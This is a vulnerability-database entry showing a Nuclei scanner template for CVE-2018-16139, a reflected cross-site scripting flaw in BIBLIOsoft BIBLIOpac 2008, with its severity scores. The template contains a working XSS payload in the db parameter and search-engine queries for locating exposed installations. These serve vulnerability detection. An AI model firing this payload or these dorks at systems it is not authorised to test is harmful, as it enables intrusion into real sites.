Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-16139
HistorySep 10, 2022 - 12:02 a.m.

BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting

2022-09-1000:02:29
ProjectDiscovery
github.com
3

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

49.0%

BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML.
id: CVE-2018-16139

info:
  name: BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting
  author: atomiczsec
  severity: medium
  description: |
    BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest patch or upgrade to a newer version of BIBLIOsoft BIBLIOpac 2008 that addresses the XSS vulnerability.
  reference:
    - https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16139
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-16139
    cwe-id: CWE-79
    epss-score: 0.00135
    epss-percentile: 0.48718
    cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: bibliosoft
    product: bibliopac
    shodan-query:
      - title:"Bibliopac"
      - http.title:"bibliopac"
    fofa-query: title="bibliopac"
    google-query: intitle:"bibliopac"
  tags: cve,cve2018,xss,bibliopac,bibliosoft

http:
  - method: GET
    path:
      - '{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db="><script>prompt(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>prompt(document.domain)</script>.xrf'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022023dde117662333438c84453a2b78d70f4e34e523adb4977cc91e3b4ca95770d902207d20b575a2e6fc9158e82d114ee21604b003642b35da9588cc82d365a92906c0:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

49.0%

Related for NUCLEI:CVE-2018-16139